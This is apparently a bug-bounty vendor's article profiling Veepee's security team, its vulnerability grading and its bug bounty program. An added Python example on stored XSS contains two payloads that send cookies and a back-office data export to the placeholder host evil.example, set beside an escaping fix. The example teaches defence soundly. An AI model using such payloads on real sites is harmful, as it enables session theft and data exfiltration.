Veepee’s CISO and Lead OffSec told us about the tight security of this e-commerce giant. Let’s take a look behind the scenes.
What is Veepee? If we had asked you, you would probably have told us about the famous flash sales platform, its flashy pink logo or your last pair of sneakers. And you would be right. We all know Veepee as a key player in European digital commerce.
But there is a side of Veepee that is much less known: that of a group with a long-standing tech culture, coupled with a digital security practice that strives to remain exemplary. Behind the Veepee we all know, there is vpTech.
“vpTech, it’s the will to create a real tech community”
The vpTech community was born in 2016, from the merger of the different groups that compose Veepee today. It is a twofold entity: vpTech is the IS Department of the company, but also a brand identity on its own. Antonin Garcia, CISO at Veepee, explains:
“Before, Veepee was a company with a lot of providers, which had integrated many solutions. Then, 7 years ago, the decision was made to invest heavily in tech. To hire a lot of people, to create an internal cloud, to create a synergy and a common brand to group together the tech activities of Veepee… vpTech is the will to create a real tech company.”
With vpTech, Veepee has done what many other businesses have failed to achieve: integrate technology into the DNA of the company. The entity delivers solutions and tools to the rest of the group, both for the e-commerce platform and for the providers and client brands. Concretely, vpTech represents:
- more than 800 employees
- spread over 6 countries
- and using more than fifty technologies
Internalize developments to ensure ownership of the products’ security
By having its own in-house technology fleet, the company can be more agile and take ownership of its product security in a way that would otherwise be impossible. Antonin, the CISO, says:
“At Veepee, developers, SREs, architects, product owners are all in-house and are responsible for their products. So when you have a vulnerability, you don’t need to open a ticket with a provider or a system manager. We really have ownership from start to finish; of the code, the applications, the servers, everything.”
Veepee: one brand, many digital security challenges
Security is a major business issue for Veepee, whose e-commerce platform records 4.5 million unique visitors and 130K€ of orders every day. But the group’s attack surface is not limited to its public platform. Julien Reitzel is Lead Offensive Security at Veepee. He states:
“We have the e-commerce platform, but behind it there are many other tools. Internal, but also external tools for the brands that sell on Veepee. For example, we have a marketplace, and recently the Re-cycle service. So there are a number of activities and sites that are not intended for members but B2B oriented. All of this put together represents a fairly large attack surface.”
Antonin Garcia concurs:
“We are not only an e-commerce player. Our CEO often says that we do B2B2C, our core business is to help brands to sell their inventory by offering quality products to our members. So we have many partners with whom we discuss and exchange information. And obviously, with the e-commerce part, we face all the classic attacks as soon as we have an exposed IP. A vulnerability on a public exposure does not do any good.”
Digital security challenges are thus varied for the company, which has:
- a publicly exposed e-commerce platform;
- a fleet of 800 techs at vpTech working to deploy technology solutions for internal and external use;
- an ecosystem of partners and brands, a source of information exchange.
To address these challenges, Veepee has created its own internal security team within vpTech. A choice that is fully in line with the tech company’s internalization strategy. After all, you’re never better served than by yourself.
Veepee: an internal security team split into four divisions
The security team at vpTech is composed of a dozen people, organized into four units:
- InfoSec (Information Security), in charge of GRC (Governance, Risk and Compliance);
- the SOC (Security Operations Center), which deals with log management, alert and security incident management. In short, the detection of suspicious behavior internally;
- OffSec (Offensive Security), which manages the offensive part – pentests, vulnerabilities, red team, management of bug bounty programs;
- the Engineering division, with SREs who develop solutions and architecture projects, in addition to improving the infrastructure of the services used in-house.
This breakdown of roles can be explained in large part by the vision of security held by Antonin, the group’s CISO:
“Before joining Veepee, I had a very governance and compliance oriented career. I was a QSA (Qualified Security Assessor), and I was doing PCI DSS compliance in banking environments, which were very process-oriented. Then I joined Veepee, with a totally different IT, almost that of a start-up.
We immediately tried to avoid being too policy- and governance-oriented, but rather to do something highly operational. Governance and standards can make you lose sight of the essence of security. If you hide too much behind policies and processes, you no longer know why you are doing them. You end up with things that are great on paper, but which are a mess in operational terms. […] I think that the biggest challenge for the CISO is to find the right balance between governance, defense, offense and day-to-day business operations.
For us, it started with defense. We created a SOC, we deployed our own servers, we centralize the logs… Then, we moved on to the offensive. Today, we are about ten people and it fits in the culture of vpTech. We don’t want to take on contractors to train people who will leave at the end of their mission. The idea is that the security is carried by knowledgeable people in-house.”
Incident management: “Being prepared is mainly about surrounding yourself with competent and responsible people”
We cannot stress this enough: effective security must be proactive from start to finish. If prevention and detection of incidents are essential, having a response plan is just as important. And here again, Veepee sets an example:
“Any company that is exposed on the Internet will suffer a few breaches in a year, it’s inevitable. But the important thing is not the breach, it’s the preparation. You have to be prepared in such a way that it is as limited as possible, and that your teams are as ready as possible to respond, but most importantly as quickly as possible.
At Veepee, we are lucky to have a great Incident Management team. They have developed all the tooling in place, the on-call methodology, and even little things like a Slack bot that helps open operational incidents. We can be very reactive, and activate people quickly.
If you start asking questions once the breach has happened, it’s a bit late… You have to implement traceability, and a lot of offensive security. But being prepared is mainly about surrounding yourself with competent and responsible people.”
– Antonin Garcia, CISO at Veepee
vpTech: thinking of security with multiple teams and technologies
vpTech has no less than 800 techs in 6 countries. The internalization of such a technological strike force is a real asset for the group. Nevertheless, the multiplication of teams and technologies comes with its share of challenges in terms of digital security. This is what Julien Reitzel, Lead of the Offensive Security team, explains:
“What you see as a customer, as a member, is the e-commerce website. But behind veepee.fr, there are a lot of teams that take care of the different pages. Some of them handle account creations and login, others the display of sales or payments. And there is not only the .fr site: Veepee is present in Spain, in Germany, in Italy…
So that’s a lot of different teams and technologies used, especially since not everyone has the same maturity. And there is always some legacy, and a Shadow IT part like in all companies, with people doing their own thing.”
Control through centralization and accountability
How do you ensure the proper security of the applications being produced when the techs outnumber the security team 80 to 1? A daunting challenge for the group’s CISO – but as he likes to say, “not even afraid!” Antonin thought deeply about it:
“At Veepee, the security team cannot check all publications of all applications. Why not? Because there are only a dozen of us and 800 people producing. We want agility, and we want to put code into production quickly. So we asked ourselves a lot of questions. How do we control? How do we interact with the devs?
The idea of security is that it should be as close as possible to the job, to the production phase. We’re not on a Change Management system, or a validation one. Everyone is autonomous, and we approach the relationship with the developers differently.
For example, we use DefectDojo, a really great open-source tool made by OWASP. It standardizes all the inputs of the vulnerability tools. We managed to organize all our tests inside – pentest, red/purple team, bug bounty… Today, the collaboration with developers and SREs is mostly done through this tool.
When we find vulnerabilities, no matter where they come from, we add them to the tool and the products receive a summary email per month with a score. Teams are assessed on a level of maturity, and the idea is to gamify the whole thing a bit. Each product has a grade between A and E, we try to publish them and they include it in their dashboards.”
– Antonin Garcia, CISO
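To make the monthly scoring concrete, here is an added example (written for this page, not Veepee's or DefectDojo's code) that turns a list of open findings, whatever their source, into a penalty per product and an A to E grade. The severity weights, the SLA deadlines, the grade thresholds, the product names and the findings themselves are all constructed assumptions for illustration; the page does not describe Veepee's actual formula, and DefectDojo's real API returns richer objects than this.

```python
"""Monthly product grading from open findings (added example, hypothetical scoring)."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import date
from typing import Iterable

# Assumed weights per severity and the number of days a finding may stay open before it
# counts as overdue. Neither table comes from the page; tune them to your own risk appetite.
SEVERITY_WEIGHT = {"Critical": 10, "High": 5, "Medium": 2, "Low": 1, "Info": 0}
SLA_DAYS = {"Critical": 7, "High": 30, "Medium": 90, "Low": 180, "Info": 365}
# Assumed grade ceilings: a penalty at or below the ceiling earns that letter, above D is E.
GRADE_CEILINGS = (("A", 0), ("B", 5), ("C", 15), ("D", 30))


@dataclass(frozen=True)
class Finding:
    product: str
    severity: str
    source: str      # e.g. "pentest", "bug bounty", "red team"; kept for reporting only
    opened: date
    active: bool = True


def finding_penalty(finding: Finding, today: date) -> int:
    """Severity weight, doubled once the finding has been open longer than its SLA."""
    if not finding.active:
        return 0
    weight = SEVERITY_WEIGHT[finding.severity]
    days_open = (today - finding.opened).days
    return weight * 2 if days_open > SLA_DAYS[finding.severity] else weight


def grade(penalty: int) -> str:
    """Map an accumulated penalty to a letter grade using GRADE_CEILINGS."""
    for letter, ceiling in GRADE_CEILINGS:
        if penalty <= ceiling:
            return letter
    return "E"


def monthly_report(products: Iterable[str], findings: Iterable[Finding], today: date) -> dict:
    """Penalty and grade per product; products with no open findings keep an A."""
    penalties = {p: 0 for p in products}
    for f in findings:
        penalties[f.product] = penalties.get(f.product, 0) + finding_penalty(f, today)
    return {p: {"penalty": pen, "grade": grade(pen)} for p, pen in penalties.items()}


# Constructed sample data: product names and findings are invented for this example.
SAMPLE_PRODUCTS = ("checkout", "login", "catalog", "recycle")
SAMPLE_FINDINGS = [
    Finding("checkout", "Critical", "bug bounty", date(2024, 6, 1)),           # 29 days open, past SLA
    Finding("checkout", "Low", "pentest", date(2024, 6, 25)),
    Finding("login", "Medium", "pentest", date(2024, 1, 10)),                 # past SLA
    Finding("login", "High", "red team", date(2024, 6, 20)),
    Finding("catalog", "Low", "bug bounty", date(2024, 6, 28)),
    Finding("catalog", "Critical", "bug bounty", date(2024, 3, 3), active=False),  # fixed, no penalty
]
REPORT_DATE = date(2024, 6, 30)

if __name__ == "__main__":
    report = monthly_report(SAMPLE_PRODUCTS, SAMPLE_FINDINGS, REPORT_DATE)
    for product, row in sorted(report.items()):
        print(f"{product:10s} penalty={row['penalty']:3d} grade={row['grade']}")
```

The design choice worth copying is that the grade is driven by time-to-fix as much as by severity: a single critical left open past its deadline costs more than several fresh lows, which is what pushes teams to remediate rather than to argue about the count.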
Raising security awareness among developers
It’s not enough to centralize, you also have to educate. At Veepee, security is also a matter of raising awareness among the tech professions. This is a subject that Julien takes to heart:
“The security team is part of vpTech, part of the IS Department. We are in the same community as the developers, but there are a lot of products and teams. The relationship we have with the devs and POs differs from one product to another. We are very close to certain teams, and it is inevitably more complicated with others who have a lower security culture. It is therefore essential to provide security training to developers. Originally, I even joined Veepee for that – before doing pentesting, I was a dev myself. […]
For instance, we organized CTFs (Capture The Flag) internally, with small security tests intended for the tech-savvy people. I remember a safe we put in our office. You had to send some instructions to open it. We put chocolates inside for the winner, it was fun. We had a lot of participants, and it got people interested.”
– Julien Reitzel, Lead OffSec
A few years ago, Veepee chose to launch a bug bounty program with Yogosha. In addition to its primary objectives of detecting vulnerabilities, the program had an unexpected effect internally. This new form of audit has sparked the curiosity of the developers, and reinforced their investment in the remediation of vulnerabilities identified by the Yogosha Strike Force hunters. Julien explains:
“I didn’t expect it, but we’ve noticed that vulnerabilities reported through bug bounty get more interest from teams.
Like everyone else, we conducted pentests with service providers, who delivered a nice PDF report at the end that we sent to the relevant teams. Some of them took it into account and made the corrections quickly. But with others, nothing had changed a year or two later, and we would discover the same vulnerabilities during new rounds of penetration testing.
We quickly understood that the bug bounty provided a new dimension. When we say that a vulnerability comes from bug bounty, they think, ‘ah, but that means anyone on the Internet can do that to my application! And on top of that, we had to pay someone for finding that particular vuln.’”
Antonin agrees: “Talking about bug bounty, it questions the tech and non-tech professions. They ask what it is, how it works. For me, that was a great win.”
Bug Bounty, a key element of Veepee’s offensive security
Although everything is going well today, Antonin, the CISO, was not reassured at first by the idea of jumping into the bug bounty adventure:
“I had never done bug bounty before. At first it was a little scary, you think you’re going to allow guys to break in without being able to hide behind the law. Then it was complicated to defend it at the budget, when even I didn’t trust it. I didn’t know if we were going to burn the budget in 24h, 48h, two weeks… So I called a few CISO buddies around, who explained to me what they were doing.
In the end, we went straight to *.veepee.fr – not even afraid! What I found really nice is that we can manage our perimeters and invited hunters, so we can get more mature ourselves. We were able to start with very few hunters, and then increase as we went along. Being on a private bug bounty is also very comfortable. We can manage the community and the people, it’s easier.”
Today, things have changed. The anxiety of the beginning has disappeared, and the CISO of Veepee doesn’t regret his choice:
“I’m really happy with the Yogosha service, and especially with the support. For me, it is mandatory today to do bug bounty. You can’t ignore it, it would be like hiding from the world. I thought that we were going to get rid of the need to do pentesting, but no, it’s still necessary. Bug bounty has turned out to be a new tool, and one that is indispensable for me.”
The bug bounty is now fully integrated in the vulnerability detection strategy of the security team, in addition to other tests.
“We know how to do pentesting, and the applications that are very exposed for members, we know them. But bug bounty allows you to go after the blind spots, the small services that are not necessarily maintained or with less rigor,” explains Antonin.
A statement backed up by Julien, from Offensive Security: “Thanks to Yogosha, we already learned about a number of perimeters, subdomains and servers exposed on the Internet that we hadn’t had a chance to look at before. It’s allowed us to cut off things that we weren’t necessarily aware of.”
A bug bounty managed in-house
As you may have understood, at vpTech they like to do things themselves. And the bug bounty is no exception to the rule. It is the Offensive Security team that takes care of the relationship with the hackers and the triage of the reports. A real plus according to Antonin: “Since they do pentesting, they have the necessary finesse to gauge vulnerabilities. They know how to qualify criticality, and engage in a dialogue if there is disagreement with a hunter.”
As for the relationship with the Yogosha Strike Force hunters, Antonin advocates discussion.
“We always remain very cordial. Security is a small world, and it can affect our public image. […] Anecdotally, we can get into a bit of a tussle with the hackers. The Yogosha KYC has been really interesting [editor’s note: all our hunters are ID verified]. We contact each other, we can have discussions. But what we’ve come to understand is that we’re all human. You have to take the time to discuss, to exchange and to understand the different opinions.
Disagreements usually come from the CVSS criticality score, which does not always reflect the real business impact of a vulnerability. This is the real difficulty of bug bounty, you have to know how to determine the real impact of a vulnerability, while recognizing the time spent on it by a hunter.”
“With bug bounty, we sometimes have hunters who go really deep.”
The bug bounty allows hunters to dig deep and over time, where other forms of audits such as penetration testing are time-bound. This different philosophy allows bug bounty to bring to light complex vulnerabilities that are difficult and time-consuming to identify. Veepee’s CISO confirms:
“We’ve done a lot of pentests, we always do some for compliance or to get back on critical applications. […] But with bug bounty, it’s different. You’re not waiting for a report, you’re waiting for a critical vulnerability. That’s the difference as well. And with Yogosha, criticals have almost always been relevant. It’s not the secure cookie or the poorly configured HSTS that you can get from a pentester who gets to the end of their 5 days, and has to make a report despite not having found much.”
– Antonin Garcia
Julien also testifies to the accuracy of the bug bounty, and of the reports submitted by the hackers of the Yogosha Strike Force.
“With penetration testing, the perimeter is clearly defined. If you find a vulnerability, you don’t necessarily go further. With bug bounty, we sometimes have hunters who go really deep. Some of them place real orders on the site, so they spend their money to find vulnerabilities behind. With external pentests, we’ve never seen that. […]
When we do a pentest, an XSS is often about displaying an alert box or session cookies, but it rarely goes further. With bug bounty, we had XSS stored from a frontend that allowed us to do things on the backoffice.
This kind of thing also allows us to raise awareness among devs. Knowing that you can take a screenshot of a backoffice that is normally not accessible from the Internet, or take control of the browser and potentially dump a database via an XSS, it adds impact and interest.”
– Julien Reitzel, Lead OffSec at Veepee.
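The stored XSS path Julien describes, a customer-facing field that later executes in a back-office page, is shown below as an added example (not Veepee's code; the page gives no detail of the real finding). A frontend handler stores a free-text order note, and two back-office renderers display it: the vulnerable one interpolates the raw string into both an attribute and element text, the hardened one escapes for each context. The in-memory store, the field names, the markup and the two payloads (with `evil.example` as a placeholder host) are all constructed for illustration.

```python
"""Stored XSS from a frontend field into a back-office page: vulnerable and hardened renderers."""
from __future__ import annotations

import html

# Constructed in-memory stand-in for the orders table (assumption, not a real schema).
ORDER_STORE: list[dict] = []


def submit_order_note(order_id: int, note: str) -> None:
    """Customer-facing handler. Storing the raw note is correct: escaping is an output concern,
    and it must be applied everywhere the note is later rendered, including internal tools."""
    ORDER_STORE.append({"id": order_id, "note": note})


def render_backoffice_vulnerable(orders: list[dict]) -> str:
    """Back-office page that trusts stored data. The note lands in a title attribute and as
    element text; either context is enough for a payload to run in an employee's browser."""
    rows = "".join(
        f'<tr><td>{o["id"]}</td><td title="{o["note"]}">{o["note"]}</td></tr>' for o in orders
    )
    return f"<table>{rows}</table>"


def render_backoffice_hardened(orders: list[dict]) -> str:
    """Same page with context-appropriate escaping. html.escape with quote=True also encodes
    the quote characters, so the attribute cannot be closed early; the id is coerced to int."""
    rows = "".join(
        f'<tr><td>{int(o["id"])}</td>'
        f'<td title="{html.escape(o["note"], quote=True)}">{html.escape(o["note"])}</td></tr>'
        for o in orders
    )
    return f"<table>{rows}</table>"


def has_live_markup(rendered: str) -> bool:
    """Crude check for the two payload shapes below: an unescaped tag or a closed attribute
    followed by an event handler. Good enough for the example, not a general XSS detector."""
    lowered = rendered.lower()
    return "<script" in lowered or '" onmouseover=' in lowered


# Constructed payloads. The first targets the text context, the second breaks out of the
# title attribute and exfiltrates an internal export, mirroring the "dump a database" impact.
SCRIPT_PAYLOAD = "<script>new Image().src='//evil.example/?c='+document.cookie</script>"
ATTRIBUTE_PAYLOAD = (
    '" onmouseover="fetch(\'/backoffice/export\')'
    ".then(r=>r.text()).then(t=>location='//evil.example/?d='+btoa(t))"
)

if __name__ == "__main__":
    submit_order_note(1001, SCRIPT_PAYLOAD)
    submit_order_note(1002, ATTRIBUTE_PAYLOAD)
    print("vulnerable page executes payload:", has_live_markup(render_backoffice_vulnerable(ORDER_STORE)))
    print("hardened page executes payload:  ", has_live_markup(render_backoffice_hardened(ORDER_STORE)))
```

Note that the fix sits entirely in the back-office renderer, which is exactly the team a frontend-only review would never have looked at; a templating engine with autoescaping on by default removes the need to remember it on every page.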
Julien also confides that critical reports submitted by hunters are so often relevant that they recently began generating 24/7 alerts at vpTech. “We decided this only for criticals, we don’t want to be woken up at any time for a medium!” We apologize in advance to all vpTech developers who will have to wake up because of our hunters.
Now you know what’s behind the pink butterfly logo. The next time you order on Veepee, you’ll know that on the other side of the screen, there’s Antonin, Julien and the rest of the vpTech team ready to wake up in the middle of the night to make sure the service is secure.
Curious about bug bounty? Learn more about Yogosha’s solutions.